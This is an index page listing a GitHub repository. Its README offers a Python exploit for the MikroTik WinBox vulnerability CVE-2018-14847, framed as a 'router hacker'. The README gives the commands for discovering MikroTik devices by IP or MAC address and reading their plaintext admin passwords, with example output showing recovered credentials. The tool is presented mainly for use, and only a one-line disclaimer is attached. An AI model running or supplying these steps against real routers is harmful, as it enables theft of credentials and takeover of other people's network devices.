Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/johnoseni1/router-hacker-exploit-and-extract-user-and-password-
This is a python wifi (router) hacker , having ability to search for mikrotic devices around you and get their <MAC> address then extract their user and password
https://github.com/johnoseni1/router-hacker-exploit-and-extract-user-and-password-
exploit hacking ipaddress macaddress mikrotik port python safety
Last synced: 3 months ago
JSON representation
This is a python wifi (router) hacker , having ability to search for mikrotic devices around you and get their <MAC> address then extract their user and password
- Host: GitHub
- URL: https://github.com/johnoseni1/router-hacker-exploit-and-extract-user-and-password-
- Owner: johnoseni1
- Created: 2021-11-11T07:39:46.000Z (about 3 years ago)
- Default Branch: main
- Last Pushed: 2021-11-11T07:44:15.000Z (about 3 years ago)
- Last Synced: 2024-04-21T14:27:06.386Z (9 months ago)
- Topics: exploit, hacking, ipaddress, macaddress, mikrotik, port, python, safety
- Language: Python
- Homepage:
- Size: 8.79 KB
- Stars: 20
- Watchers: 2
- Forks: 8
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# please this was created by John , and shouldn't be used for any opposite intentions
# WinboxExploit
This is a proof of concept of the critical WinBox vulnerability (CVE-2018-14847) which allows for arbitrary file read of plain text passwords.## Requirements
- Python 3+This script will NOT run with Python 2.x or lower.
## How To Use
The script is simple used with simple arguments in the commandline.#### WinBox (TCP/IP)
Exploit the vulnerability and read the password.
```
python3 WinboxExploit.py [PORT]
```
Example:
```
$ python3 WinboxExploit.py 172.17.17.17
Connected to 172.17.17.17:8291Exploit successful
User: admin
Pass: Th3P4ssWord
```#### MAC server WinBox (Layer 2)
You can extract files even if the device doesn't have an IP address.Simple discovery check for locally connected Mikrotik devices.
```
python3 MACServerDiscover.py
```
Example:
```
$ python3 MACServerDiscover.py
Looking for Mikrotik devices (MAC servers)aa:bb:cc:dd:ee:ff
aa:bb:cc:dd:ee:aa
```Exploit the vulnerability and read the password.
```
python3 MACServerExploit.py
```
Example:
```
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ffUser: admin
Pass: Th3P4ssWord
```